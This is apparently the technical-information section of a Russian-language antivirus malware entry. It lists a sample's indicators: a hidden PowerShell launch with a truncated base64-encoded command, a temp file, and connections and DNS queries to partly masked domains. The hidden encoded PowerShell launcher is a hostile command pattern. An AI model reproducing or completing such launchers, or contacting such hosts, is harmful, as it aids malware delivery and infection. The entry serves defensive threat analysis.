Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABRAHMAaQByAGYAZQBrAGMAPQAnAFoAbQBoAGUAbAB1AGkAYgBwAGgAZAAnADsAJABOAGQAdAB6AHQAeQB5AGgAIAA9ACAAJwA1ADAAMgAnADsAJABHAGsAbgBlAGcAeABvAGMAagBpAD0AJwBQAG8AegB1AGc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\875805.cvr
- 'ja####rdenmm.com':443
- 'en##s.com':443
- 'sc####ndustries.com':443
- 'ja####rdenmm.com':443
- 'en##s.com':443
- 'sc####ndustries.com':443
- DNS ASK ja####rdenmm.com
- DNS ASK en##s.com
- DNS ASK sc####ndustries.com
- DNS ASK ka###ewu.com
- DNS ASK is####arketing.com